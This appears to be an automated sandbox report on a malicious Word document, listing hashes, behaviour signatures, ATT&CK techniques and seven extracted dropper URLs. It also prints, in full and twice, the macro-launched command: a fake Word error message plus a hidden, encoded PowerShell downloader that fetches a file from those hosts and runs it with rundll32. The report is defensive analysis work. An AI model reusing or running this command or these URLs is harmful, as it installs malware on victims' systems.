Analysis

  • max time kernel
    135s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-01-2021 19:33

General

  • Target

    Info_IU_03693.doc

  • Size

    160KB

  • MD5

    11b2f224825ee841b6df0e52298bee2c

  • SHA1

    9e139896444a4c946221570a019b3fec05f0a419

  • SHA256

    b9f57f97d4ea9c107ca90927fdd5e4f7b5e3eb315ff4fa568f600f1700dc3f8f

  • SHA512

    1a6e4b11ba9988c98ba663b6bfd38022aae0183fde5808e036de2c6b831c54a0d5516031dc6bb0de53105cd2a3b86903bc0b14b991d38ad1f2c5335df32c383a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongsijiacheng.com/wp-content/jn5/

exe.dropper

http://artistascitizen.com/wp-content/Bx3cr6/

exe.dropper

http://ombchardin.com/archive/V/

exe.dropper

https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/

exe.dropper

https://happycheftv.com/wp-admin/z6uGcbY/

exe.dropper

https://careercoachconnection.com/tenderometer/4K/

exe.dropper

https://tacademicos.com/content/JbF68i/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Info_IU_03693.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1308
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1048

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/980-7-0x0000000000000000-mapping.dmp
    • memory/1048-11-0x0000023FD1AA0000-0x0000023FD1AA1000-memory.dmp
      Filesize

      4KB

    • memory/1048-8-0x0000000000000000-mapping.dmp
    • memory/1048-9-0x00007FF8CDE60000-0x00007FF8CE84C000-memory.dmp
      Filesize

      9.9MB

    • memory/1048-10-0x0000023FD18F0000-0x0000023FD18F1000-memory.dmp
      Filesize

      4KB

    • memory/1048-12-0x0000023FB92A0000-0x0000023FB92A2000-memory.dmp
      Filesize

      8KB

    • memory/1048-13-0x0000023FB92A3000-0x0000023FB92A5000-memory.dmp
      Filesize

      8KB

    • memory/1048-14-0x0000023FB92A6000-0x0000023FB92A8000-memory.dmp
      Filesize

      8KB

    • memory/1308-4-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/1308-5-0x00007FF8D6250000-0x00007FF8D6887000-memory.dmp
      Filesize

      6.2MB

    • memory/1308-6-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/1308-3-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/1308-2-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB